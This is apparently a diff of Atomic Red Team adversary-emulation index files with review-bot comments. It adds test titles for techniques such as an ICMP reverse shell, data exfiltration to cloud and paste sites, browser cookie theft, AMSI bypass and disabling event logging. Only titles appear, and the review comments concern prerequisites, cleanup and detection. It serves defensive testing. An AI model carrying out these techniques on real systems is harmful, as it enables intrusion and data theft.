- Atomic Test #38: Enumerate Available Drives via gdr [windows]
- Atomic Test #39: Discover OS Product Name via Registry [windows]
- Atomic Test #40: Discover OS Build Number via Registry [windows]
- [T1016.002 System Network Configuration Discovery: Wi-Fi Discovery](../../T1016.002/T1016.002.md)
- Atomic Test #1: Enumerate Stored Wi-Fi Profiles And Passwords via netsh [windows]
- [T1010 Application Window Discovery](../../T1010/T1010.md)
@@ -2615,6 +2653,8 @@
- Atomic Test #6: Discover System Language by Environment Variable Query [linux]
- Atomic Test #7: Discover System Language with dism.exe [windows]
- Atomic Test #8: Discover System Language by Windows API Query [windows]
- Atomic Test #9: Discover System Language with WMIC [windows]
- Atomic Test #10: Discover System Language with Powershell [windows]
- [T1012 Query Registry](../../T1012/T1012.md)
- Atomic Test #1: Query Registry [windows]
- Atomic Test #2: Query Registry with Powershell cmdlets [windows]
@@ -2639,6 +2679,8 @@
- Atomic Test #11: Get Windows Defender exclusion settings using WMIC [windows]
- [T1526 Cloud Service Discovery](../../T1526/T1526.md)
- Atomic Test #1: Azure - Dump Subscription Data with MicroBurst [iaas:azure]
- Atomic Test #2: AWS - Enumerate common cloud services [iaas:aws]
- Atomic Test #3: Azure - Enumerate common cloud services [iaas:azure]
- [T1018 Remote System Discovery](../../T1018/T1018.md)
- Atomic Test #1: Remote System Discovery - net [windows]
- Atomic Test #2: Remote System Discovery - net group Domain Computers [windows]
@@ -2674,6 +2716,7 @@
- Atomic Test #9: Network Service Discovery for Containers [containers]
- Atomic Test #10: Port-Scanning /24 Subnet with PowerShell [windows]
- Atomic Test #11: Remote Desktop Services Discovery via PowerShell [windows]
- Atomic Test #12: Port Scan using nmap (Port range) [linux, macos]
- [T1518 Software Discovery](../../T1518/T1518.md)
- Atomic Test #1: Find and Display Internet Explorer Browser Version [windows]
- Atomic Test #2: Applications Installed [windows]
@@ -2690,6 +2733,7 @@
- Atomic Test #3: System Time Discovery in FreeBSD/macOS [linux, macos]
- Atomic Test #4: System Time Discovery W32tm as a Delay [windows]
- Atomic Test #5: System Time with Windows time Command [windows]
- Atomic Test #6: Discover System Time Zone via Registry [windows]
# resource-development
- T1583 Acquire Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -2778,7 +2822,8 @@
- T1592.002 Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1593.001 Social Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1589.001 Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1595.003 Wordlist Scanning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1595.003 Active Scanning: Wordlist Scanning](../../T1595.003/T1595.003.md)
- Atomic Test #1: Web Server Wordlist Scan [windows, linux, macos]
- T1591.004 Identify Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1598 Phishing for Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1595.001 Scanning IP Blocks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -2815,6 +2860,7 @@
- [T1491.001 Defacement: Internal Defacement](../../T1491.001/T1491.001.md)
- Atomic Test #1: Replace Desktop Wallpaper [windows]
- Atomic Test #2: Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message [windows]
- Atomic Test #3: ESXi - Change Welcome Message on Direct Console User Interface (DCUI) [windows]
- T1496.004 Cloud Service Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1496.001 Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565 Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -2847,6 +2893,7 @@
- Atomic Test #2: FreeBSD/macOS/Linux - Overwrite file with DD [linux, macos]
- Atomic Test #3: Overwrite deleted data on C drive [windows]
- Atomic Test #4: GCP - Delete Bucket [iaas:gcp]
- Atomic Test #5: ESXi - Delete VM Snapshots [windows]
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1490 Inhibit System Recovery](../../T1490/T1490.md)
@@ -2878,6 +2925,7 @@
- Atomic Test #12: Logoff System - Windows [windows]
- Atomic Test #13: ESXi - Terminates VMs using pkill [windows]
- Atomic Test #14: ESXi - Avoslocker enumerates VMs and forcefully kills VMs [windows]
- Atomic Test #15: ESXi - vim-cmd Used to Power Off VMs [windows]
# initial-access
- [T1133 External Remote Services](../../T1133/T1133.md)
@@ -2951,11 +2999,13 @@
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- Atomic Test #3: DNSExfiltration (doh) [windows]
- Atomic Test #4: Exfiltrate Data using DNS Queries via dig [macos, linux]
- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1567.003 Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md)
- Atomic Test #1: Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows) [windows]
- [T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md)
- Atomic Test #1: Exfiltrate data with rclone to cloud Storage - Mega (Windows) [windows]
- Atomic Test #2: Exfiltrate data with rclone to cloud Storage - AWS S3 [linux, macos]
- [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
- Atomic Test #1: Data Transfer Size Limits [macos, linux]
- Atomic Test #2: Network-Based Data Transfer in Small Chunks [windows]
@@ -350,7 +350,7 @@
- T1559.001 Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1106 Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059.010 AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059.010 Command and Scripting Interpreter: AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -490,7 +490,9 @@
- T1219 Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1572 Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1572 Protocol Tunneling](../../T1572/T1572.md)
- Atomic Test #5: Microsoft Dev tunnels (Linux/macOS) [linux, macos]
- Atomic Test #6: VSCode tunnels (Linux/macOS) [linux, macos]
- T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.002 External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
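Review bot: T1572 tests #5 and #6 (Microsoft Dev tunnels, VSCode tunnels) rely on the devtunnel and code CLIs and on an interactive sign-in to a Microsoft or GitHub account; the test YAML should list those as prerequisites, and cleanup must stop the tunnel, because an orphaned tunnel leaves an inbound path into the test host through the vendor relay after the test ends.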
@@ -510,7 +512,8 @@
- T1573 Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1095 Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1095 Non-Application Layer Protocol](../../T1095/T1095.md)
- Atomic Test #4: Linux ICMP Reverse Shell using icmp-cnc [linux]
- T1001.003 Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
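Review bot: T1095 test #4 "Linux ICMP Reverse Shell using icmp-cnc" will typically need raw ICMP sockets (root or CAP_NET_RAW) unless the tool uses unprivileged ICMP datagram sockets; confirm elevation_required is set to match, and note in the detection guidance that the kernel keeps answering echo requests normally, so the signal is echo payloads of unusual size or content rather than ICMP volume.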
@@ -668,6 +671,9 @@
- Atomic Test #1: Find AWS credentials [macos, linux]
- Atomic Test #3: Extract passwords with grep [linux, macos]
- Atomic Test #6: Find and Access Github Credentials [linux, macos]
- Atomic Test #15: Find Azure credentials [macos, linux]
- Atomic Test #16: Find GCP credentials [macos, linux]
- Atomic Test #17: Find OCI credentials [macos, linux]
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1552.006 Unsecured Credentials: Group Policy Preferences [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -792,6 +798,7 @@
- [T1046 Network Service Discovery](../../T1046/T1046.md)
- Atomic Test #1: Port Scan [linux, macos]
- Atomic Test #2: Port Scan Nmap [linux, macos]
- Atomic Test #12: Port Scan using nmap (Port range) [linux, macos]
- T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1124 System Time Discovery](../../T1124/T1124.md)
@@ -892,9 +899,11 @@
- [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- Atomic Test #4: Exfiltrate Data using DNS Queries via dig [macos, linux]
- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.003 Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md)
- Atomic Test #2: Exfiltrate data with rclone to cloud Storage - AWS S3 [linux, macos]
- [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
- Atomic Test #1: Data Transfer Size Limits [macos, linux]
- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -25,7 +25,10 @@
- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.009 Impair Defenses: Safe Boot Mode [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #4: Detect Virtualization Environment (MacOS) [macos]
- Atomic Test #4: Detect Virtualization Environment via ioreg [macos]
- Atomic Test #6: Detect Virtualization Environment using sysctl (hw.model) [macos]
- Atomic Test #7: Check if System Integrity Protection is enabled [macos]
- Atomic Test #8: Detect Virtualization Environment using system_profiler [macos]
- T1218.004 Signed Binary Proxy Execution: InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.008 Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.001 Hijack Execution Flow: DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
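Review bot: test #7 "Check if System Integrity Protection is enabled" sits under Virtualization/Sandbox Evasion: System Checks, but SIP status is not by itself a virtualization indicator; the test description should spell out the inference it relies on (analysis VMs are often run with SIP disabled) or the test belongs under a different technique. Tests #4, #6 and #8 (ioreg, sysctl hw.model, system_profiler) are clearly in scope, and renaming #4 from "(MacOS)" to "via ioreg" makes the set readable.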
@@ -304,7 +307,7 @@
- T1559.001 Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1106 Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059.010 AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059.010 Command and Scripting Interpreter: AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -432,7 +435,9 @@
- T1219 Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1572 Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1572 Protocol Tunneling](../../T1572/T1572.md)
- Atomic Test #5: Microsoft Dev tunnels (Linux/macOS) [linux, macos]
- Atomic Test #6: VSCode tunnels (Linux/macOS) [linux, macos]
- T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.002 External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -503,7 +508,8 @@
- [T1115 Clipboard Data](../../T1115/T1115.md)
- Atomic Test #3: Execute commands from clipboard [macos]
- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1005 Data from Local System](../../T1005/T1005.md)
- Atomic Test #3: Copy Apple Notes database files using AppleScript [macos]
- T1560.002 Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1560 Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1185 Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -551,6 +557,7 @@
- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1539 Steal Web Session Cookie](../../T1539/T1539.md)
- Atomic Test #3: Steal Chrome Cookies via Remote Debugging (Mac) [macos]
- Atomic Test #5: Copy Safari BinaryCookies files using AppleScript [macos]
- T1003.002 OS Credential Dumping: Security Account Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.002 Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1003.004 OS Credential Dumping: LSA Secrets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
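Review bot: test #5 "Copy Safari BinaryCookies files using AppleScript" (and T1005 test #3 copying the Apple Notes database in the hunk above) reads from TCC-protected paths under ~/Library; unless the invoking terminal has Full Disk Access the copy fails or raises a consent prompt, so both tests need that prerequisite in their description or dependency check, and the detection note should point at the TCC denial event and at osascript touching those paths.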
@@ -588,6 +595,9 @@
- Atomic Test #2: Extract Browser and System credentials with LaZagne [macos]
- Atomic Test #3: Extract passwords with grep [linux, macos]
- Atomic Test #6: Find and Access Github Credentials [linux, macos]
- Atomic Test #15: Find Azure credentials [macos, linux]
- Atomic Test #16: Find GCP credentials [macos, linux]
- Atomic Test #17: Find OCI credentials [macos, linux]
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1552.006 Unsecured Credentials: Group Policy Preferences [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -631,7 +641,10 @@
- Atomic Test #6: Enumerate users and groups [linux, macos]
- Atomic Test #7: Enumerate users and groups [macos]
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #4: Detect Virtualization Environment (MacOS) [macos]
- Atomic Test #4: Detect Virtualization Environment via ioreg [macos]
- Atomic Test #6: Detect Virtualization Environment using sysctl (hw.model) [macos]
- Atomic Test #7: Check if System Integrity Protection is enabled [macos]
- Atomic Test #8: Detect Virtualization Environment using system_profiler [macos]
- T1069.002 Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1007 System Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1040 Network Sniffing](../../T1040/T1040.md)
@@ -688,6 +701,7 @@
- [T1046 Network Service Discovery](../../T1046/T1046.md)
- Atomic Test #1: Port Scan [linux, macos]
- Atomic Test #2: Port Scan Nmap [linux, macos]
- Atomic Test #12: Port Scan using nmap (Port range) [linux, macos]
- [T1518 Software Discovery](../../T1518/T1518.md)
- Atomic Test #3: Find and Display Safari Browser Version [macos]
- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -778,9 +792,11 @@
- [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- Atomic Test #4: Exfiltrate Data using DNS Queries via dig [macos, linux]
- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.003 Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md)
- Atomic Test #2: Exfiltrate data with rclone to cloud Storage - AWS S3 [linux, macos]
- [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
- Atomic Test #1: Data Transfer Size Limits [macos, linux]
- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -104,6 +104,7 @@
- Atomic Test #3: attrib - Remove read-only attribute [windows]
- Atomic Test #4: attrib - hide file [windows]
- Atomic Test #5: Grant Full Access to folder for Everyone - Ryuk Ransomware Style [windows]
- Atomic Test #6: SubInAcl Execution [windows]
- T1574.014 AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.007 Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md)
- Atomic Test #1: Msiexec.exe - Execute Local MSI file with embedded JScript [windows]
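Review bot: test #6 "SubInAcl Execution" is named by tool rather than by effect, unlike its neighbours (#3 "attrib - Remove read-only attribute", #5 "Grant Full Access to folder for Everyone"); rename it to say which ACL change it makes, and since SubInAcl is a separately downloaded Microsoft Resource Kit binary the test needs a dependency check rather than assuming it is on disk.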
@@ -125,6 +126,7 @@
- Atomic Test #11: Prevent Powershell History Logging [windows]
- Atomic Test #12: Clear Powershell History by Deleting History File [windows]
- Atomic Test #13: Set Custom AddToHistoryHandler to Avoid History File Logging [windows]
- Atomic Test #14: Clear PowerShell Session History [windows]
- [T1202 Indirect Command Execution](../../T1202/T1202.md)
- Atomic Test #1: Indirect Command Execution - pcalua.exe [windows]
- Atomic Test #2: Indirect Command Execution - forfiles.exe [windows]
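Review bot: test #14 "Clear PowerShell Session History" should state how it differs from #12 "Clear Powershell History by Deleting History File": clearing the session history (Clear-History) empties only the in-memory list of the current session, while PSReadLine's ConsoleHost_history.txt on disk is untouched, so the two leave different artifacts and need different detections.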
@@ -198,6 +200,9 @@
- Atomic Test #5: Clear Windows Audit Policy Config [windows]
- Atomic Test #6: Disable Event Logging with wevtutil [windows]
- Atomic Test #7: Makes Eventlog blind with Phant0m [windows]
- Atomic Test #8: Modify Event Log Channel Access Permissions via Registry - PowerShell [windows]
- Atomic Test #9: Modify Event Log Channel Access Permissions via Registry 2 - PowerShell [windows]
- Atomic Test #10: Modify Event Log Access Permissions via Registry - PowerShell [windows]
- [T1218.002 Signed Binary Proxy Execution: Control Panel](../../T1218.002/T1218.002.md)
- Atomic Test #1: Control Panel Items [windows]
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
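Review bot: test #9 "Modify Event Log Channel Access Permissions via Registry 2 - PowerShell" differs from #8 only by the suffix "2"; name it by what actually differs (the channel or registry value it targets) so readers can pick the right test from the index. The same goes for #10, whose "Access Permissions" versus "Channel Access Permissions" is hard to tell apart from #8 at a glance.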
@@ -213,6 +218,7 @@
- Atomic Test #22: Blackbit - Disable Windows Firewall using netsh firewall [windows]
- Atomic Test #23: ESXi - Disable Firewall via Esxcli [windows]
- Atomic Test #24: Set a firewall rule using New-NetFirewallRule [windows]
- Atomic Test #25: ESXi - Set Firewall to PASS Traffic [windows]
- [T1553.003 Subvert Trust Controls: SIP and Trust Provider Hijacking](../../T1553.003/T1553.003.md)
- Atomic Test #1: SIP (Subject Interface Package) Hijacking via Custom DLL [windows]
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -344,6 +350,10 @@
- Atomic Test #7: Disable .NET Event Tracing for Windows Via Registry (powershell) [windows]
- Atomic Test #8: LockBit Black - Disable the ETW Provider of Windows Defender -cmd [windows]
- Atomic Test #9: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell [windows]
- Atomic Test #10: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd [windows]
- Atomic Test #11: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell [windows]
- Atomic Test #12: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd [windows]
- Atomic Test #13: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell [windows]
- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070 Indicator Removal on Host](../../T1070/T1070.md)
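Review bot: tests #10-#13 are one action (disable .NET ETW through an environment variable stored in the registry) split four ways over HKCU/HKLM and cmd/PowerShell; if the project's conventions allow, fold them into fewer tests with input arguments, otherwise keep the names parallel as they are here. The same four-way split recurs in #54-#57 (EventLog-Application auto logger session / ETW provider) further down.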
@@ -458,6 +468,10 @@
- Atomic Test #51: Delete Microsoft Defender ASR Rules - InTune [windows]
- Atomic Test #52: Delete Microsoft Defender ASR Rules - GPO [windows]
- Atomic Test #53: AMSI Bypass - Create AMSIEnable Reg Key [windows]
- Atomic Test #54: Disable EventLog-Application Auto Logger Session Via Registry - Cmd [windows]
- Atomic Test #55: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell [windows]
- Atomic Test #56: Disable EventLog-Application ETW Provider Via Registry - Cmd [windows]
- Atomic Test #57: Disable EventLog-Application ETW Provider Via Registry - PowerShell [windows]
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -797,6 +811,7 @@
- Atomic Test #17: Modify BootExecute Value [windows]
- Atomic Test #18: Allowing custom application to execute during new RDP logon session [windows]
- Atomic Test #19: Creating Boot Verification Program Key for application execution during successful boot [windows]
- Atomic Test #20: Add persistence via Windows Context Menu [windows]
- [T1098 Account Manipulation](../../T1098/T1098.md)
- Atomic Test #1: Admin Account Manipulate [windows]
- Atomic Test #2: Domain Account and Group Manipulate [windows]
@@ -930,7 +945,8 @@
- Atomic Test #3: WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique [windows]
- Atomic Test #4: WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique [windows]
- Atomic Test #5: Run Shellcode via Syscall in Go [windows]
- T1059.010 AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.010 Command and Scripting Interpreter: AutoHotKey & AutoIT](../../T1059.010/T1059.010.md)
- Atomic Test #1: AutoHotKey script execution [windows]
- [T1059 Command and Scripting Interpreter](../../T1059/T1059.md)
- Atomic Test #1: AutoIt Script Execution [windows]
- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
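Review bot: now that T1059.010 is a real page carrying test #1 "AutoHotKey script execution", the "AutoIt Script Execution" test still listed as #1 under the parent T1059 should move to T1059.010, whose name explicitly covers AutoHotKey & AutoIT; otherwise the index points readers at two places for the same sub-technique.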
@@ -1156,6 +1172,7 @@
- Atomic Test #17: Modify BootExecute Value [windows]
- Atomic Test #18: Allowing custom application to execute during new RDP logon session [windows]
- Atomic Test #19: Creating Boot Verification Program Key for application execution during successful boot [windows]
- Atomic Test #20: Add persistence via Windows Context Menu [windows]
- [T1098 Account Manipulation](../../T1098/T1098.md)
- Atomic Test #1: Admin Account Manipulate [windows]
- Atomic Test #2: Domain Account and Group Manipulate [windows]
@@ -1270,6 +1287,7 @@
- Atomic Test #12: RustDesk Files Detected Test on Windows [windows]
- Atomic Test #13: Splashtop Execution [windows]
- Atomic Test #14: Splashtop Streamer Execution [windows]
- Atomic Test #15: Microsoft App Quick Assist Execution [windows]
- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1572 Protocol Tunneling](../../T1572/T1572.md)
@@ -1476,6 +1494,7 @@
- [T1539 Steal Web Session Cookie](../../T1539/T1539.md)
- Atomic Test #1: Steal Firefox Cookies (Windows) [windows]
- Atomic Test #2: Steal Chrome Cookies (Windows) [windows]
- Atomic Test #4: Steal Chrome v127+ cookies via Remote Debugging (Windows) [windows]
- [T1003.002 OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md)
- Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
- Atomic Test #2: Registry parse with pypykatz [windows]
@@ -1690,6 +1709,7 @@
- Atomic Test #8: Enumerate all accounts on Windows (Local) [windows]
- Atomic Test #9: Enumerate all accounts via PowerShell (Local) [windows]
- Atomic Test #10: Enumerate logged on users via CMD (Local) [windows]
- Atomic Test #11: ESXi - Local Account Discovery via ESXCLI [windows]
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #3: Detect Virtualization Environment (Windows) [windows]
